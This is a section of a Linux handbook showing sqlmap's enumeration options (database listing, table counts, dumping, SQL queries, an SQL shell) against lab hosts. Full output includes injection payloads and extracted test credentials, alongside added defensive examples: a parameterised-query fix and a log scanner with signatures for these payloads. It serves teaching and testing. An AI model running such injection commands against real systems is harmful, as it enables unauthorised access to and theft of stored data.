3.6. Enumeration

3.6.1. dbs

$ sqlmap -u "http://172.16.0.44/test/testdb.php?id=12" --dbs
[*] starting at: 15:59:20

[15:59:20] [INFO] testing connection to the target url
[15:59:20] [INFO] testing if the url is stable, wait a few seconds
[15:59:22] [INFO] url is stable
[15:59:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[15:59:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[15:59:22] [INFO] testing if GET parameter 'id' is dynamic
[15:59:22] [INFO] confirming that GET parameter 'id' is dynamic
[15:59:22] [INFO] GET parameter 'id' is dynamic
[15:59:22] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[15:59:22] [INFO] testing unescaped numeric injection on GET parameter 'id'
[15:59:22] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[15:59:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[15:59:22] [INFO] testing for parenthesis on injectable parameter
[15:59:22] [INFO] the injectable parameter requires 0 parenthesis
[15:59:22] [INFO] testing MySQL
[15:59:22] [INFO] confirming MySQL
[15:59:22] [INFO] query: SELECT 2 FROM information_schema.TABLES LIMIT 0, 1
[15:59:22] [INFO] retrieved: 2
[15:59:22] [INFO] performed 13 queries in 0 seconds
[15:59:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0

[15:59:22] [INFO] fetching database names
[15:59:22] [INFO] fetching number of databases
[15:59:22] [INFO] query: SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR(10000)), CHAR(32)) FROM information_schema.SCHEMATA
[15:59:22] [INFO] retrieved: 3
[15:59:23] [INFO] performed 13 queries in 0 seconds
[15:59:23] [INFO] query: SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(10000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1
[15:59:23] [INFO] retrieved: information_schema
[15:59:27] [INFO] performed 132 queries in 4 seconds
[15:59:27] [INFO] query: SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(10000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 1, 1
[15:59:27] [INFO] retrieved: groupgoods
[15:59:29] [INFO] performed 76 queries in 2 seconds
[15:59:29] [INFO] query: SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(10000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 2, 1
[15:59:29] [INFO] retrieved: test
[15:59:30] [INFO] performed 34 queries in 1 seconds
available databases [3]:
[*] groupgoods
[*] information_schema
[*] test

[15:59:30] [INFO] Fetched data logged to text files under '/home/neo/.sqlmap/output/172.16.0.44'

[*] shutting down at: 15:59:30
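The "unescaped numeric injection" sqlmap confirms above comes from pasting the id parameter straight into the query text. The following added example (not code from the original handbook) reproduces that defect against a constructed in-memory SQLite table modelled on the page's test table, places the parameterised fix beside it, and uses the page's own boolean probe to check that only the unescaped version changes its answer; the column names and the use of sqlite3 in place of MySQL are assumptions.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the page's 'test' table (SQLite instead of MySQL);
    the columns password, id, username are inferred from the --sql-shell output."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE test (password TEXT, id INTEGER, username TEXT)")
    conn.executemany("INSERT INTO test VALUES (?, ?, ?)",
                     [("chen", 98, "neo"), ("chen", 111, "neo"), ("zheng", 112, "jam")])
    return conn

def lookup_unescaped(conn, raw_id):
    """The defect sqlmap reports as 'unescaped numeric injectable':
    the request parameter is concatenated straight into the WHERE clause."""
    return conn.execute("SELECT * FROM test WHERE id = " + raw_id).fetchall()

def lookup_parameterised(conn, raw_id):
    """Hardened form: enforce the integer type first, then bind the value as a
    placeholder so it is never parsed as SQL."""
    try:
        id_value = int(raw_id)
    except ValueError:
        return []  # not an integer id: reject instead of querying
    return conn.execute("SELECT * FROM test WHERE id = ?", (id_value,)).fetchall()

def differs_on_boolean_probe(lookup, conn):
    """sqlmap's boolean-based check from the listing above: on a fixed endpoint a
    true and a false condition appended to the same id must give the same
    response. Returns True when the endpoint still leaks the difference."""
    true_rows = lookup(conn, "98 AND 4108=4108")
    false_rows = lookup(conn, "98 AND 4108=4109")
    return len(true_rows) != len(false_rows)

if __name__ == "__main__":
    db = make_db()
    print("unescaped leaks:", differs_on_boolean_probe(lookup_unescaped, db))          # True
    print("parameterised leaks:", differs_on_boolean_probe(lookup_parameterised, db))  # False
```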

3.6.2. --count

$ sqlmap -u "http://localhost/test.php?id=98" --count

    sqlmap/1.0-dev (r4843) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:36:50

[14:36:51] [INFO] using '/home/neo/sqlmap-dev/output/localhost/session' as session file
[14:36:51] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:36:51] [INFO] testing connection to the target url
[14:36:51] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=98 AND 4108=4108

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: id=98 UNION ALL SELECT CONCAT(0x3a6b79703a,0x57596b57416f63567046,0x3a6c757a3a), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=98 AND SLEEP(5)
---

[14:36:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[14:36:51] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[14:36:51] [INFO] fetching database names
[14:36:51] [INFO] fetching tables for databases: information_schema, mysql, neo, performance_schema, test
[14:36:52] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:36:52] [INFO] retrieved:
[14:36:52] [INFO] retrieved:
[14:36:52] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
Database: neo
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| test                                  | 43      |
| stuff                                 | 4       |
| users                                 | 3       |
+---------------------------------------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 667     |
| GLOBAL_STATUS                         | 291     |
| SESSION_STATUS                        | 291     |
| GLOBAL_VARIABLES                      | 276     |
| SESSION_VARIABLES                     | 276     |
| USER_PRIVILEGES                       | 138     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128     |
| COLLATIONS                            | 127     |
| PARTITIONS                            | 90      |
| TABLES                                | 80      |
| STATISTICS                            | 78      |
| KEY_COLUMN_USAGE                      | 64      |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 36      |
| TABLE_CONSTRAINTS                     | 35      |
| PLUGINS                               | 10      |
| ENGINES                               | 8       |
| SCHEMATA                              | 5       |
| PROCESSLIST                           | 1       |
+---------------------------------------+---------+

Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 1028    |
| help_topic                            | 508     |
| help_keyword                          | 465     |
| help_category                         | 38      |
| user                                  | 8       |
| db                                    | 3       |
| proxies_priv                          | 2       |
+---------------------------------------+---------+

[14:36:57] [INFO] Fetched data logged to text files under '/home/neo/sqlmap-dev/output/localhost'

[*] shutting down at 14:36:57

3.6.3. --dump/--dump-all

$ sqlmap -u "http://localhost/test.php?id=98" --dump-all --flush-session

3.6.4. --sql-query

$ sqlmap -u "http://localhost/test.php?id=98" --sql-query="SELECT username, password FROM test"

    sqlmap/1.0-dev (r4843) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:46:57

[15:46:58] [INFO] using '/home/neo/sqlmap-dev/output/localhost/session' as session file
[15:46:58] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[15:46:58] [INFO] testing connection to the target url
[15:46:58] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=98 AND 4108=4108

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: id=98 UNION ALL SELECT CONCAT(0x3a6b79703a,0x57596b57416f63567046,0x3a6c757a3a), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=98 AND SLEEP(5)
---

[15:46:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[15:46:58] [INFO] fetching SQL SELECT statement query output: 'SELECT username, password FROM test'
SELECT username, password FROM test [6]:
[*] neo, chen
[*] jam, zheng
[*] john, meng
[*] neo1, chen
[*] jam2, zheng
[*] john3, meng

[15:46:58] [INFO] Fetched data logged to text files under '/home/neo/sqlmap-dev/output/localhost'

[*] shutting down at 15:46:58

3.6.5. --sql-shell

$ sqlmap -u "http://localhost/test.php?id=98" -v 1 --sql-shell 

    sqlmap/1.0-dev (r4812) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:54:39

[09:54:40] [INFO] using '/home/neo/sqlmap-dev/output/localhost/session' as session file
[09:54:40] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[09:54:40] [INFO] testing connection to the target url
[09:54:40] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=98 AND 8779=8779

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: id=98 UNION ALL SELECT NULL, CONCAT(0x3a72776a3a,0x546a7a6578746f575762,0x3a62746d3a), NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=98 AND SLEEP(5)
---

[09:54:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[09:54:40] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select * from test;
[*] chen, 98, neo
[*] chen, 111, neo
[*] zheng, 112, jam
sql-shell>
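From the defender's side, the three injection types sqlmap lists in the sessions above leave recognisable traces in the web server's access log. The following added example (not part of the original handbook) URL-decodes constructed Nginx-style log lines and classifies them against signatures for those payload shapes and for sqlmap's default User-Agent; the log lines, the client IP and the User-Agent string are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Payload shapes taken from the injection points sqlmap reported above.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+\d+=\d+\b", re.I),
    "UNION query": re.compile(r"\bUNION\s+ALL\s+SELECT\b", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "schema enumeration": re.compile(r"\binformation_schema\.", re.I),
}

# Combined log format as written by Nginx/Apache (the constructed lines below follow it).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+ "[^"]*" "(?P<ua>[^"]*)"'
)

def classify(line):
    """Return a record with the matched signature names, or None if the line does
    not parse. The path is URL-decoded first so %20/%3D/%23 cannot hide keywords."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    path = unquote_plus(m.group("path"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(path)]
    if "sqlmap" in m.group("ua").lower():  # sqlmap's default User-Agent is assumed here
        hits.append("sqlmap user-agent")
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": path, "hits": hits}

def scan(lines):
    """Keep only the lines that triggered at least one signature."""
    return [r for r in map(classify, lines) if r and r["hits"]]

# Constructed sample log: one normal request, then the three payloads listed on this page.
SAMPLE_LOG = [
    '172.16.0.20 - - [01/Jan/2018:15:59:20 +0800] "GET /test/testdb.php?id=12 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '172.16.0.20 - - [01/Jan/2018:15:59:22 +0800] "GET /test.php?id=98%20AND%204108%3D4108 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '172.16.0.20 - - [01/Jan/2018:15:59:23 +0800] "GET /test.php?id=98%20UNION%20ALL%20SELECT%20CONCAT(0x3a6b79703a,0x57596b57416f63567046,0x3a6c757a3a),%20NULL,%20NULL%23 HTTP/1.1" 200 640 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '172.16.0.20 - - [01/Jan/2018:15:59:29 +0800] "GET /test.php?id=98%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
]

if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["ts"], rec["ip"], ", ".join(rec["hits"]), "->", rec["path"])
```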

Original source: Netkiller 系列 手札 (Netkiller series handbook)
Author: 陈景峯
Please contact the author before reproducing this article, and always credit its original source, the author information and this notice.

Date: 2018-01-01
